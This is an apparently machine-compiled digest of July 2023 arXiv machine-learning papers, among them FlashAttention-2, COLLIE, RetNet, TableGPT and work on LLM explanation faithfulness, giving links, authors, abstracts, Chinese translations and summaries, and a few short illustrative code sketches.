    Abstract The emergence of microgrids (MGs) has provided a promising solution for decarbonizing and decentralizing the power grid, mitigating the challenges posed by climate change. However, MG operations often involve considering multiple objectives that represent the interests of different stakeholders, leading to potentially complex conflicts. To tackle this issue, we propose a novel multi-objective reinforcement learning framework that explores the high-dimensional objective space and uncovers the tradeoffs between conflicting objectives. This framework leverages exogenous information and capitalizes on the data-driven nature of reinforcement learning, enabling the training of a parametric policy without the need for long-term forecasts or knowledge of the underlying uncertainty distribution. The trained policies exhibit diverse, adaptive, and coordinative behaviors with the added benefit of providing interpretable insights on the dynamics of their information use. We employ this framework on the Cornell University MG (CU-MG), which is a combined heat and power MG, to evaluate its effectiveness. The results demonstrate performance improvements in all objectives considered compared to the status quo operations and offer more flexibility in navigating complex operational tradeoffs.
    摘要 随着微型电网(MG)的出现,为了解决气候变化所带来的挑战,提供了一个有前途的解决方案,即减少和分散电力网络。然而,MG的运营通常需要考虑多个目标,这些目标代表不同的利益相互之间的矛盾,这可能会导致复杂的冲突。为了解决这个问题,我们提出了一种新的多目标学习框架,该框架可以探索高维目标空间中的交叉关系,并揭示不同目标之间的负担变化。这种框架利用外生信息,并利用学习的数据驱动特性,可以在不需要长期预测或者知道下游不确定分布的情况下,训练一个参数化策略。训练出来的策略具有多样化、适应性和协调性,同时还提供了可解释的动态信息使用动态。我们在康奈尔大学微型电网(CU-MG)上使用这种框架进行评估,结果表明,相比Status quo操作,我们的方法可以提高所有考虑的目标的性能,并提供更多的操作复杂关系的灵活性。

FlashAttention-2: Faster Attention with Better Parallelism and Work Partitioning

  • paper_url: http://arxiv.org/abs/2307.08691
  • repo_url: https://github.com/dao-ailab/flash-attention
  • paper_authors: Tri Dao
  • for: 将Transformer扩展到更长的序列长度,以提升语言建模和高分辨率图像理解的性能,并开启代码、音频和视频生成等新应用。
  • methods: 利用GPU内存层次结构,在不做任何近似的情况下,将内存占用从随序列长度二次增长降为线性,并实现运行时加速。
  • results: FlashAttention-2相比FlashAttention约有2倍加速,在A100 GPU上达到理论峰值FLOPs/s的50-73%,接近GEMM操作的效率。
    Abstract Scaling Transformers to longer sequence lengths has been a major problem in the last several years, promising to improve performance in language modeling and high-resolution image understanding, as well as to unlock new applications in code, audio, and video generation. The attention layer is the main bottleneck in scaling to longer sequences, as its runtime and memory increase quadratically in the sequence length. FlashAttention exploits the asymmetric GPU memory hierarchy to bring significant memory saving (linear instead of quadratic) and runtime speedup (2-4$\times$ compared to optimized baselines), with no approximation. However, FlashAttention is still not nearly as fast as optimized matrix-multiply (GEMM) operations, reaching only 25-40\% of the theoretical maximum FLOPs/s. We observe that the inefficiency is due to suboptimal work partitioning between different thread blocks and warps on the GPU, causing either low-occupancy or unnecessary shared memory reads/writes. We propose FlashAttention-2, with better work partitioning to address these issues. In particular, we (1) tweak the algorithm to reduce the number of non-matmul FLOPs (2) parallelize the attention computation, even for a single head, across different thread blocks to increase occupancy, and (3) within each thread block, distribute the work between warps to reduce communication through shared memory. These yield around 2$\times$ speedup compared to FlashAttention, reaching 50-73\% of the theoretical maximum FLOPs/s on A100 and getting close to the efficiency of GEMM operations. We empirically validate that when used end-to-end to train GPT-style models, FlashAttention-2 reaches training speed of up to 225 TFLOPs/s per A100 GPU (72\% model FLOPs utilization).
    摘要 将Transformer扩展到更长的序列长度是近几年的一个核心问题,有望提升语言建模和高分辨率图像理解的性能,并开启代码、音频和视频生成等新应用。注意力层是扩展到长序列的主要瓶颈,因为其运行时间和内存随序列长度呈二次增长。FlashAttention利用GPU内存层次的非对称性,在不做任何近似的情况下,实现了显著的内存节省(线性而非二次)和运行时加速(相对优化基线提速2-4倍)。然而,FlashAttention仍远不及优化的矩阵乘法(GEMM)操作,只能达到理论峰值FLOPs/s的25-40%。我们发现这种低效源于GPU上不同线程块(thread block)和线程束(warp)之间的工作划分不佳,导致占用率低或产生不必要的共享内存读写。我们提出FlashAttention-2,通过更好的工作划分来解决这些问题。具体而言,我们(1)调整算法以减少非矩阵乘法的FLOPs;(2)即使对单个注意力头,也将注意力计算并行到不同的线程块上以提高占用率;(3)在每个线程块内部,将工作分配到各个warp之间,以减少经由共享内存的通信。这些改进相比FlashAttention带来约2倍的加速,在A100上达到理论峰值FLOPs/s的50-73%,接近GEMM操作的效率。我们还通过端到端训练GPT风格模型验证:FlashAttention-2可使每块A100 GPU的训练速度达到225 TFLOPs/s(模型FLOPs利用率72%)。
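
The memory saving comes from computing attention block by block with an online softmax, so the full n-by-n score matrix is never materialized. The numpy sketch below illustrates only that tiling/rescaling idea; it is not the CUDA kernel and does not model FlashAttention-2's thread-block/warp partitioning:

```python
import numpy as np

def blockwise_attention(Q, K, V, block=64):
    """Exact softmax attention computed one key/value block at a time,
    keeping a running row-wise max (m) and normalizer (l) per query."""
    n, d = Q.shape
    O = np.zeros_like(V, dtype=np.float64)
    m = np.full(n, -np.inf)          # running row-wise max of scores
    l = np.zeros(n)                  # running softmax normalizer
    scale = 1.0 / np.sqrt(d)
    for s in range(0, n, block):
        Kb, Vb = K[s:s + block], V[s:s + block]
        S = (Q @ Kb.T) * scale                    # scores for this block only
        m_new = np.maximum(m, S.max(axis=1))
        alpha = np.exp(m - m_new)                 # rescale old accumulators
        P = np.exp(S - m_new[:, None])
        l = l * alpha + P.sum(axis=1)
        O = O * alpha[:, None] + P @ Vb
        m = m_new
    return O / l[:, None]

rng = np.random.default_rng(0)
Q, K, V = (rng.normal(size=(256, 32)) for _ in range(3))
S = Q @ K.T / np.sqrt(32)
P = np.exp(S - S.max(axis=1, keepdims=True))
ref = (P / P.sum(axis=1, keepdims=True)) @ V
print(np.allclose(blockwise_attention(Q, K, V), ref))   # True
```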

COLLIE: Systematic Construction of Constrained Text Generation Tasks

  • paper_url: http://arxiv.org/abs/2307.08689
  • repo_url: https://github.com/princeton-nlp/Collie
  • paper_authors: Shunyu Yao, Howard Chen, Austin W. Hanjie, Runzhe Yang, Karthik Narasimhan
  • for: 本研究旨在提供一种 grammar-based 框架,用于 specifying 复杂的、compositional 约束,以便在自然语言处理中进行 Text generation under constraints。
  • methods: 本研究使用了 grammar-based 框架 COLLIE,可以Specify 多种层次的约束(word、sentence、paragraph、passage)和模型挑战(语言理解、逻辑推理、计数、semantic planning)。此外,还开发了一些自动提取任务实例的工具,以便使用 COLLIE 进行数据生成。
  • results: 通过使用 COLLIE,研究人员构建了 COLLIE-v1 数据集,共包含 2080 个任务实例,涵盖 13 种约束结构。对五种经过指令微调的语言模型进行的系统实验与分析揭示了这些模型的不足。COLLIE 框架设计为轻量且可扩展,希望社区能借此开发更复杂的约束和评测方法。
    Abstract Text generation under constraints have seen increasing interests in natural language processing, especially with the rapidly improving capabilities of large language models. However, existing benchmarks for constrained generation usually focus on fixed constraint types (e.g.,generate a sentence containing certain words) that have proved to be easy for state-of-the-art models like GPT-4. We present COLLIE, a grammar-based framework that allows the specification of rich, compositional constraints with diverse generation levels (word, sentence, paragraph, passage) and modeling challenges (e.g.,language understanding, logical reasoning, counting, semantic planning). We also develop tools for automatic extraction of task instances given a constraint structure and a raw text corpus. Using COLLIE, we compile the COLLIE-v1 dataset with 2080 instances comprising 13 constraint structures. We perform systematic experiments across five state-of-the-art instruction-tuned language models and analyze their performances to reveal shortcomings. COLLIE is designed to be extensible and lightweight, and we hope the community finds it useful to develop more complex constraints and evaluations in the future.
    摘要 受约束的文本生成在自然语言处理领域受到越来越多的关注,尤其是在大语言模型能力快速提升的背景下。然而,现有的受约束生成基准通常只关注固定类型的约束(例如生成包含某些词的句子),而这些约束对GPT-4等最先进的模型来说已被证明过于简单。我们提出了COLLIE,一个基于文法的框架,可以指定丰富的、可组合的约束,涵盖不同的生成层级(词、句、段落、篇章)和多种建模挑战(如语言理解、逻辑推理、计数、语义规划)。我们还开发了在给定约束结构和原始语料的情况下自动抽取任务实例的工具。利用COLLIE,我们构建了包含13种约束结构、共2080个实例的COLLIE-v1数据集。我们在五个经过指令微调的最先进语言模型上进行了系统实验,并通过分析其表现揭示了不足之处。COLLIE被设计为可扩展且轻量,我们希望社区能借助它在未来开发更复杂的约束与评测。
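
A toy illustration of how compositional constraints of the kind COLLIE specifies can be expressed and composed as predicates; the constraint names and this mini "grammar" are illustrative, not COLLIE's actual API:

```python
from typing import Callable

Constraint = Callable[[str], bool]

def contains(word: str) -> Constraint:
    return lambda text: word in text.split()

def word_count_is(n: int) -> Constraint:
    return lambda text: len(text.split()) == n

def last_word_is(word: str) -> Constraint:
    return lambda text: bool(text.split()) and text.split()[-1] == word

def all_of(*constraints: Constraint) -> Constraint:
    return lambda text: all(c(text) for c in constraints)

# A compositional task instance: a 7-word sentence containing "model"
# and ending with "data".
task = all_of(word_count_is(7), contains("model"), last_word_is("data"))
print(task("our model learns structure from noisy data"))   # True
print(task("our model learns from data"))                   # False
```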

An R package for parametric estimation of causal effects

  • paper_url: http://arxiv.org/abs/2307.08686
  • repo_url: None
  • paper_authors: Joshua Wolff Anderson, Cyril Rakovski
  • for: 本文旨在介绍 R 包 CausalModels 的使用方法,该包用于估计因果效应,已发布在 CRAN 上。
  • methods: 该包实现了若干常用的统计方法,包括标准化、IP加权、G-估计、结果回归、工具变量和倾向评分匹配等。
  • results: 本文提供了一个简单易用的框架,可以在 R 的单个包中将多种用于估计因果效应的统计方法整合进一致的建模流程。
    Abstract This article explains the usage of R package CausalModels, which is publicly available on the Comprehensive R Archive Network. While packages are available for sufficiently estimating causal effects, there lacks a package that provides a collection of structural models using the conventional statistical approach developed by Hernan and Robins (2020). CausalModels addresses this deficiency of software in R concerning causal inference by offering tools for methods that account for biases in observational data without requiring extensive statistical knowledge. These methods should not be ignored and may be more appropriate or efficient in solving particular problems. While implementations of these statistical models are distributed among a number of causal packages, CausalModels introduces a simple and accessible framework for a consistent modeling pipeline among a variety of statistical methods for estimating causal effects in a single R package. It consists of common methods including standardization, IP weighting, G-estimation, outcome regression, instrumental variables and propensity matching.
    摘要 本文介绍了 R 包 CausalModels 的使用方法,该包已在 Comprehensive R Archive Network(CRAN)上公开发布。虽然已有一些可用于估计因果效应的软件包,但目前仍缺少一个按照 Hernan 和 Robins(2020)的传统统计方法汇集结构模型的软件包。CausalModels 弥补了 R 在因果推断软件方面的这一不足,提供了无需深厚统计知识即可校正观察数据偏倚的方法工具。这些方法不应被忽视,在特定问题上可能更为合适或高效。虽然这些统计模型的实现分散在多个因果推断软件包中,CausalModels 在单个 R 包内为多种因果效应估计方法提供了一个简单易用、流程一致的建模框架,其中包括标准化、IP加权、G-估计、结果回归、工具变量和倾向评分匹配等常用方法。

A Rubik’s Cube inspired approach to Clifford synthesis

  • paper_url: http://arxiv.org/abs/2307.08684
  • repo_url: https://github.com/gshartnett/rubiks-clifford-synthesis
  • paper_authors: Ning Bao, Gavin S. Hartnett
  • for: 解决Clifford元素的分解问题,即Clifford合成问题。
  • methods: 采用机器学习方法,基于距离标准的近似来实现Clifford合成。
  • results: 比现有算法更具有灵活性,可以适应特定设备的gate集、设备拓扑和gate精度。
    Abstract The problem of decomposing an arbitrary Clifford element into a sequence of Clifford gates is known as Clifford synthesis. Drawing inspiration from similarities between this and the famous Rubik's Cube problem, we develop a machine learning approach for Clifford synthesis based on learning an approximation to the distance to the identity. This approach is probabilistic and computationally intensive. However, when a decomposition is successfully found, it often involves fewer gates than existing synthesis algorithms. Additionally, our approach is much more flexible than existing algorithms in that arbitrary gate sets, device topologies, and gate fidelities may incorporated, thus allowing for the approach to be tailored to a specific device.
    摘要 将任意的Clifford元素分解为一系列Clifford门的问题被称为Clifford合成。受该问题与著名的魔方(Rubik's Cube)问题之间相似性的启发,我们提出了一种基于机器学习的Clifford合成方法,其核心是学习一个到单位元距离的近似。该方法是概率性的,且计算量较大;但当成功找到分解时,所需的门数往往少于现有的合成算法。此外,我们的方法比现有算法灵活得多,可以纳入任意的门集合、器件拓扑和门保真度,因而能够针对特定器件进行定制。

Do Models Explain Themselves? Counterfactual Simulatability of Natural Language Explanations

  • paper_url: http://arxiv.org/abs/2307.08678
  • repo_url: None
  • paper_authors: Yanda Chen, Ruiqi Zhong, Narutatsu Ri, Chen Zhao, He He, Jacob Steinhardt, Zhou Yu, Kathleen McKeown
  • for: 这个论文旨在研究大型自然语言模型(LLM)是否可以解释自己的决策过程。
  • methods: 作者提出以自然语言解释的反事实可模拟性(counterfactual simulatability)作为评估标准,检验 LLM 的解释能否帮助人类建立关于模型如何处理不同输入的心智模型。
  • results: 研究发现,LLM 解释的精度较低,且精度与解释的合理性(plausibility)并不相关,因此仅直接优化人类认可度(例如 RLHF)可能并不足够。
    Abstract Large language models (LLMs) are trained to imitate humans to explain human decisions. However, do LLMs explain themselves? Can they help humans build mental models of how LLMs process different inputs? To answer these questions, we propose to evaluate $\textbf{counterfactual simulatability}$ of natural language explanations: whether an explanation can enable humans to precisely infer the model's outputs on diverse counterfactuals of the explained input. For example, if a model answers "yes" to the input question "Can eagles fly?" with the explanation "all birds can fly", then humans would infer from the explanation that it would also answer "yes" to the counterfactual input "Can penguins fly?". If the explanation is precise, then the model's answer should match humans' expectations. We implemented two metrics based on counterfactual simulatability: precision and generality. We generated diverse counterfactuals automatically using LLMs. We then used these metrics to evaluate state-of-the-art LLMs (e.g., GPT-4) on two tasks: multi-hop factual reasoning and reward modeling. We found that LLM's explanations have low precision and that precision does not correlate with plausibility. Therefore, naively optimizing human approvals (e.g., RLHF) may not be a sufficient solution.
    摘要 大型自然语言模型(LLM)在训练时尝试模仿人类的决策,但是 LLM 是否能够解释自己的处理逻辑?可以使用 counterfactual simulatability 来评估 LLM 的解释能力。我们定义 counterfactual simulatability 为:一个解释是否能够帮助人类建立模型处理输入的精准模型。例如,如果一个模型对 input 问题 "Can eagles fly?" 的答案是 "yes",并且提供解释 "all birds can fly",那么人类就可以从解释中推断出模型对 counterfactual input "Can penguins fly?" 的答案是什么。如果解释准确,那么模型的答案应该与人类的预期相符。为了评估 LLM 的 counterfactual simulatability,我们提出了两种指标:精度和通用性。我们使用 LLM 自动生成了多个 counterfactual,然后使用这些指标来评估当前 state-of-the-art LLM (例如 GPT-4)在 multi-hop factual reasoning 和 reward modeling 两个任务上的表现。我们发现 LLM 的解释准确率很低,而且准确率与可能性无关。因此,直接优化人类的批准(例如 RLHF)可能并不是一个充分的解决方案。
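
A sketch of the precision side of counterfactual simulatability: over generated counterfactuals, count how often the answer a human would infer from the explanation matches the model's actual answer. The function names and toy data are illustrative only:

```python
def simulatability_precision(counterfactuals, model_answer, human_inference):
    """Fraction of counterfactual inputs on which the explanation lets a
    human correctly predict the model's output (counting only cases where
    the explanation licenses some inference at all)."""
    agree, covered = 0, 0
    for x in counterfactuals:
        inferred = human_inference(x)      # None = explanation uninformative here
        if inferred is None:
            continue
        covered += 1
        agree += int(inferred == model_answer(x))
    return agree / covered if covered else float("nan")

# Toy example around the explanation "all birds can fly".
model = {"Can eagles fly?": "yes", "Can penguins fly?": "yes", "Can dogs fly?": "no"}

def human_inference(q):
    # What "all birds can fly" lets a human infer; non-bird questions are uncovered.
    return "yes" if q in {"Can eagles fly?", "Can penguins fly?"} else None

print(simulatability_precision(list(model), lambda q: model[q], human_inference))  # 1.0
```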

TableGPT: Towards Unifying Tables, Nature Language and Commands into One GPT

  • paper_url: http://arxiv.org/abs/2307.08674
  • repo_url: None
  • paper_authors: Liangyu Zha, Junlin Zhou, Liyao Li, Rui Wang, Qingyi Huang, Saisai Yang, Jing Yuan, Changbao Su, Xiang Li, Aofeng Su, Tao Zhang, Chen Zhou, Kaizhe Shou, Miao Wang, Wufang Zhu, Guoshan Lu, Chao Ye, Yali Ye, Wentao Ye, Yiming Zhang, Xinglong Deng, Jie Xu, Haobo Wang, Gang Chen, Junbo Zhao
  • for: 论文旨在提供一个可以通过自然语言输入操作表格的框架,使用大语言模型(LLMs)来理解和处理表格。
  • methods: 该框架基于全新的全球表格表示方式,通过同时训练 LLMs 在表格和文本模式之间,以便它们能够深入理解表格数据并在指令链中执行复杂的操作。
  • results: TableGPT 可以提供简单易用的表格操作方式,包括问答、数据操作、数据可视化、分析报告生成和自动预测等,从而为用户提供更多的便利和访问ibilty。
    Abstract Tables are prevalent in real-world databases, requiring significant time and effort for humans to analyze and manipulate. The advancements in large language models (LLMs) have made it possible to interact with tables using natural language input, bringing this capability closer to reality. In this paper, we present TableGPT, a unified fine-tuned framework that enables LLMs to understand and operate on tables using external functional commands. It introduces the capability to seamlessly interact with tables, enabling a wide range of functionalities such as question answering, data manipulation (e.g., insert, delete, query, and modify operations), data visualization, analysis report generation, and automated prediction. TableGPT aims to provide convenience and accessibility to users by empowering them to effortlessly leverage tabular data. At the core of TableGPT lies the novel concept of global tabular representations, which empowers LLMs to gain a comprehensive understanding of the entire table beyond meta-information. By jointly training LLMs on both table and text modalities, TableGPT achieves a deep understanding of tabular data and the ability to perform complex operations on tables through chain-of-command instructions. Importantly, TableGPT offers the advantage of being a self-contained system rather than relying on external API interfaces. Moreover, it supports efficient data process flow, query rejection (when appropriate) and private deployment, enabling faster domain data fine-tuning and ensuring data privacy, which enhances the framework's adaptability to specific use cases.
    摘要 表格在现实世界的数据库中无处不在,人工分析和操作表格往往需要耗费大量时间与精力。大语言模型(LLM)的进展使得用自然语言与表格交互成为可能。本文提出TableGPT,一个统一的微调框架,使LLM能够借助外部功能指令理解并操作表格。它支持与表格的无缝交互,涵盖问答、数据操作(如插入、删除、查询和修改)、数据可视化、分析报告生成和自动预测等多种功能,旨在让用户便捷地利用表格数据。TableGPT的核心是全局表格表示这一新概念,使LLM能够在元信息之外对整张表格形成整体理解。通过在表格与文本两种模态上联合训练,TableGPT获得了对表格数据的深入理解,并能够通过指令链对表格执行复杂操作。重要的是,TableGPT是一个自包含系统,不依赖外部API接口;它还支持高效的数据处理流程、必要时的查询拒绝以及私有化部署,从而可以更快地在领域数据上进行微调并保障数据隐私,增强了框架对特定应用场景的适应性。

CohortFinder: an open-source tool for data-driven partitioning of biomedical image cohorts to yield robust machine learning models

  • paper_url: http://arxiv.org/abs/2307.08673
  • repo_url: None
  • paper_authors: Fan Fan, Georgia Martinez, Thomas Desilvio, John Shin, Yijiang Chen, Bangchen Wang, Takaya Ozeki, Maxime W. Lafarge, Viktor H. Koelzer, Laura Barisoni, Anant Madabhushi, Satish E. Viswanath, Andrew Janowczyk
  • for: 缓解批次效应(batch effects)对机器学习模型泛化能力的负面影响
  • methods: 使用数据驱动的队列(cohort)划分方法来缓解批次效应的影响
  • results: 在医疗影像处理任务中,使用 CohortFinder 可以提高机器学习模型的性能
    Abstract Batch effects (BEs) refer to systematic technical differences in data collection unrelated to biological variations whose noise is shown to negatively impact machine learning (ML) model generalizability. Here we release CohortFinder, an open-source tool aimed at mitigating BEs via data-driven cohort partitioning. We demonstrate CohortFinder improves ML model performance in downstream medical image processing tasks. CohortFinder is freely available for download at cohortfinder.com.
    摘要 批次效应(batch effects, BE)指的是数据采集过程中与生物学差异无关的系统性技术差异,这类噪声已被证明会损害机器学习(ML)模型的泛化能力。我们在此发布CohortFinder,一个开源工具,通过数据驱动的队列划分来缓解批次效应。我们展示了CohortFinder能够提升ML模型在下游医学图像处理任务中的性能。CohortFinder可在cohortfinder.com免费下载。
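
Not CohortFinder itself, but a conceptual sketch of batch-effect-aware partitioning: cluster images on simple acquisition-related statistics (a stand-in for stain/scanner signatures) and keep whole clusters on one side of the train/test split:

```python
import numpy as np
from sklearn.cluster import KMeans

def batch_aware_split(image_features, n_clusters=4, test_fraction=0.3, seed=0):
    """Cluster images by batch-effect-prone features (e.g. mean stain color,
    brightness), then assign whole clusters to train or test so the model is
    evaluated on unseen acquisition conditions."""
    labels = KMeans(n_clusters=n_clusters, n_init=10,
                    random_state=seed).fit_predict(image_features)
    rng = np.random.default_rng(seed)
    order = rng.permutation(n_clusters)
    n_test_clusters = max(1, int(round(test_fraction * n_clusters)))
    test_clusters = set(order[:n_test_clusters])
    is_test = np.isin(labels, list(test_clusters))
    return np.where(~is_test)[0], np.where(is_test)[0]

# Stand-in per-image color/intensity statistics for 200 images.
feats = np.random.default_rng(0).normal(size=(200, 6))
train_idx, test_idx = batch_aware_split(feats)
print(len(train_idx), len(test_idx))
```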

Neural Image Compression: Generalization, Robustness, and Spectral Biases

  • paper_url: http://arxiv.org/abs/2307.08657
  • repo_url: None
  • paper_authors: Kelsey Lieberman, James Diffenderfer, Charles Godfrey, Bhavya Kailkhura
  • for: 评估 neural image compression (NIC) 模型在实际应用中的抗迁移性和一致性性能。
  • methods: 提供了一个完整的benchmark suite来评估图像压缩方法的out-of-distribution (OOD)性能,包括通过对流行的CLIC和Kodak基准引入15种扰动得到的CLIC-C和Kodak-C,并提出了受频谱启发的检查工具,以深入了解图像压缩方法引入的误差及其OOD性能。
  • results: 对一种经典编码器和多种 NIC 变体进行了详细的性能比较,发现了一些挑战当前我们对 NIC 的强点和局限性的发现,并通过理论分析深入了解 NIC 的OOD性能和数据的spectral properties的关系。
    Abstract Recent neural image compression (NIC) advances have produced models which are starting to outperform traditional codecs. While this has led to growing excitement about using NIC in real-world applications, the successful adoption of any machine learning system in the wild requires it to generalize (and be robust) to unseen distribution shifts at deployment. Unfortunately, current research lacks comprehensive datasets and informative tools to evaluate and understand NIC performance in real-world settings. To bridge this crucial gap, first, this paper presents a comprehensive benchmark suite to evaluate the out-of-distribution (OOD) performance of image compression methods. Specifically, we provide CLIC-C and Kodak-C by introducing 15 corruptions to popular CLIC and Kodak benchmarks. Next, we propose spectrally inspired inspection tools to gain deeper insight into errors introduced by image compression methods as well as their OOD performance. We then carry out a detailed performance comparison of a classical codec with several NIC variants, revealing intriguing findings that challenge our current understanding of the strengths and limitations of NIC. Finally, we corroborate our empirical findings with theoretical analysis, providing an in-depth view of the OOD performance of NIC and its dependence on the spectral properties of the data. Our benchmarks, spectral inspection tools, and findings provide a crucial bridge to the real-world adoption of NIC. We hope that our work will propel future efforts in designing robust and generalizable NIC methods. Code and data will be made available at https://github.com/klieberman/ood_nic.
    摘要 最近的神经图像压缩(NIC)研究已经产生了开始超越传统编解码器的模型。尽管这令人对在实际应用中使用NIC充满期待,但任何机器学习系统要想在真实环境中成功落地,都必须能够泛化(并保持稳健)以应对部署时未曾见过的分布偏移。遗憾的是,目前的研究缺乏全面的数据集和有效的工具来评估和理解NIC在真实场景中的表现。为弥补这一关键空白,本文首先提出了一个完整的基准套件,用于评估图像压缩方法的分布外(OOD)性能:我们通过对流行的CLIC和Kodak基准引入15种扰动,构建了CLIC-C和Kodak-C。其次,我们提出了受频谱启发的检查工具,以更深入地理解图像压缩方法引入的误差及其OOD表现。随后,我们对一种经典编解码器与多种NIC变体进行了详细的性能比较,得到了一些挑战我们当前对NIC优势与局限认识的有趣发现。最后,我们用理论分析印证了实验结论,深入刻画了NIC的OOD性能及其对数据频谱特性的依赖。我们的基准、频谱检查工具和研究发现为NIC走向实际应用架起了关键桥梁,希望这项工作能推动未来设计稳健且可泛化的NIC方法。代码与数据将在 https://github.com/klieberman/ood_nic 提供。

A General Framework for Learning under Corruption: Label Noise, Attribute Noise, and Beyond

  • paper_url: http://arxiv.org/abs/2307.08643
  • repo_url: None
  • paper_authors: Laura Iacovissi, Nan Lu, Robert C. Williamson
  • for: 本研究旨在系统地分析损害模型在分布水平上的影响,提供一个涵盖所有损害模型的通用框架,并研究损害对标准预测学习的影响。
  • methods: 本研究使用Markov kernel来形式地分析损害模型,并发现了 Label和特征上的复杂相互作用和依赖关系,这些关系通常被之前的研究所忽略。
  • results: 研究发现,损害对标准预测学习会导致 bayes 风险的变化,并提供了对不同损害实例的loss correction的理论分析。
    Abstract Corruption is frequently observed in collected data and has been extensively studied in machine learning under different corruption models. Despite this, there remains a limited understanding of how these models relate such that a unified view of corruptions and their consequences on learning is still lacking. In this work, we formally analyze corruption models at the distribution level through a general, exhaustive framework based on Markov kernels. We highlight the existence of intricate joint and dependent corruptions on both labels and attributes, which are rarely touched by existing research. Further, we show how these corruptions affect standard supervised learning by analyzing the resulting changes in Bayes Risk. Our findings offer qualitative insights into the consequences of "more complex" corruptions on the learning problem, and provide a foundation for future quantitative comparisons. Applications of the framework include corruption-corrected learning, a subcase of which we study in this paper by theoretically analyzing loss correction with respect to different corruption instances.
    摘要 腐败(corruption)是所采集数据中常见的现象,机器学习领域已在不同的腐败模型下对其进行了广泛研究。尽管如此,我们对这些模型之间关系的理解仍然有限,缺乏一个统一视角来刻画各种腐败及其对学习的影响。在这项工作中,我们基于Markov核,在分布层面上通过一个一般且完备的框架正式分析腐败模型。我们强调了标签与属性上存在复杂的联合与相依腐败,而这类腐败在现有研究中很少被触及。此外,我们通过分析贝叶斯风险的变化,说明这些腐败如何影响标准监督学习。我们的发现为"更复杂"的腐败对学习问题的影响提供了定性洞见,并为未来的定量比较奠定基础。该框架的应用包括腐败校正学习,本文从理论上分析了针对不同腐败实例的损失校正,作为其中一个子情形。

LearnedSort as a learning-augmented SampleSort: Analysis and Parallelization

  • paper_url: http://arxiv.org/abs/2307.08637
  • repo_url: None
  • paper_authors: Ivan Carvalho, Ramon Lawrence
  • for: 本文 analyze 和 parallelize LearnedSort algorithm,一种使用机器学习模型来实现排序的新算法。
  • methods: 本文从带预测的算法(algorithms with predictions)视角分析 LearnedSort,并论证 LearnedSort 本质上是一种学习增强的 SampleSort。
  • results: 对 synthetic 和实际 dataset 进行了 benchmark, parallel LearnedSort 比 IPS4o 和其他排序算法具有更高的并发性能。
    Abstract This work analyzes and parallelizes LearnedSort, the novel algorithm that sorts using machine learning models based on the cumulative distribution function. LearnedSort is analyzed under the lens of algorithms with predictions, and it is argued that LearnedSort is a learning-augmented SampleSort. A parallel LearnedSort algorithm is developed combining LearnedSort with the state-of-the-art SampleSort implementation, IPS4o. Benchmarks on synthetic and real-world datasets demonstrate improved parallel performance for parallel LearnedSort compared to IPS4o and other sorting algorithms.
    摘要 本工作分析并并行化了LearnedSort,这是一种利用基于累积分布函数的机器学习模型进行排序的新算法。我们从带预测的算法视角分析LearnedSort,并论证它是一种学习增强的SampleSort。我们将LearnedSort与最先进的SampleSort实现IPS4o相结合,开发了并行的LearnedSort算法。在合成数据集和真实数据集上的基准测试表明,并行LearnedSort的并行性能优于IPS4o及其他排序算法。
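
A toy version of the CDF-model idea behind LearnedSort: fit an empirical CDF on a sample, scatter keys into buckets by predicted rank, then finish each small bucket with a standard sort. The real algorithm uses a recursive learned model, careful bucketization, and parallel merging, none of which is modeled here:

```python
import numpy as np

def learned_sort(keys, n_buckets=64, sample_size=1024):
    """Toy CDF-model sort: a sampled empirical CDF predicts each key's
    approximate rank; keys are scattered into buckets by predicted rank
    and each small bucket is finished with a standard sort."""
    rng = np.random.default_rng(0)
    sample = np.sort(rng.choice(keys, size=min(sample_size, len(keys)), replace=False))
    # Predicted CDF via rank against the sorted sample ("the model").
    cdf = np.searchsorted(sample, keys) / len(sample)
    bucket_ids = np.minimum((cdf * n_buckets).astype(int), n_buckets - 1)
    buckets = [[] for _ in range(n_buckets)]
    for k, b in zip(keys, bucket_ids):
        buckets[b].append(k)
    # Buckets are ordered by predicted rank, so concatenating sorted buckets
    # yields a fully sorted array.
    return np.concatenate([np.sort(b) for b in buckets if b])

x = np.random.default_rng(1).normal(size=10_000)
print(np.array_equal(learned_sort(x), np.sort(x)))   # True
```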

Retentive Network: A Successor to Transformer for Large Language Models

  • paper_url: http://arxiv.org/abs/2307.08621
  • repo_url: https://github.com/microsoft/unilm
  • paper_authors: Yutao Sun, Li Dong, Shaohan Huang, Shuming Ma, Yuqing Xia, Jilong Xue, Jianyong Wang, Furu Wei
  • for: This paper proposes a new architecture called Retentive Network (RetNet) for large language models, which simultaneously achieves training parallelism, low-cost inference, and good performance.
  • methods: The paper uses a retention mechanism for sequence modeling, which supports three computation paradigms: parallel, recurrent, and chunkwise recurrent. The parallel representation allows for training parallelism, while the recurrent representation enables low-cost $O(1)$ inference. The chunkwise recurrent representation facilitates efficient long-sequence modeling with linear complexity.
  • results: The paper shows that RetNet achieves favorable scaling results, parallel training, low-cost deployment, and efficient inference. Experimental results on language modeling demonstrate the effectiveness of RetNet, making it a strong successor to Transformer for large language models.
    Abstract In this work, we propose Retentive Network (RetNet) as a foundation architecture for large language models, simultaneously achieving training parallelism, low-cost inference, and good performance. We theoretically derive the connection between recurrence and attention. Then we propose the retention mechanism for sequence modeling, which supports three computation paradigms, i.e., parallel, recurrent, and chunkwise recurrent. Specifically, the parallel representation allows for training parallelism. The recurrent representation enables low-cost $O(1)$ inference, which improves decoding throughput, latency, and GPU memory without sacrificing performance. The chunkwise recurrent representation facilitates efficient long-sequence modeling with linear complexity, where each chunk is encoded parallelly while recurrently summarizing the chunks. Experimental results on language modeling show that RetNet achieves favorable scaling results, parallel training, low-cost deployment, and efficient inference. The intriguing properties make RetNet a strong successor to Transformer for large language models. Code will be available at https://aka.ms/retnet.
    摘要 在这个工作中,我们提议Retentive Network(RetNet)作为大语言模型的基础架构,同时实现培训并行、低成本推理和好性能。我们理论上 derivates了回忆和注意力之间的连接。然后我们提议了保留机制,用于序列模型化,该机制支持三种计算方式,即并行、循环和块级循环。Specifically, the parallel representation allows for training parallelism. The recurrent representation enables low-cost $O(1)$ inference, which improves decoding throughput, latency, and GPU memory without sacrificing performance. The chunkwise recurrent representation facilitates efficient long-sequence modeling with linear complexity, where each chunk is encoded parallelly while recurrently summarizing the chunks.实验结果表明,RetNet实现了有利扩展性、并行培训、低成本部署和高效推理。RetNet的特有性使其成为Transformer的强 successor for large language models。代码将提供在https://aka.ms/retnet.

Understanding the impacts of crop diversification in the context of climate change: a machine learning approach

  • paper_url: http://arxiv.org/abs/2307.08617
  • repo_url: None
  • paper_authors: Georgios Giannarakis, Ilias Tsoumas, Stelios Neophytides, Christiana Papoutsa, Charalampos Kontoes, Diofantos Hadjimitsis
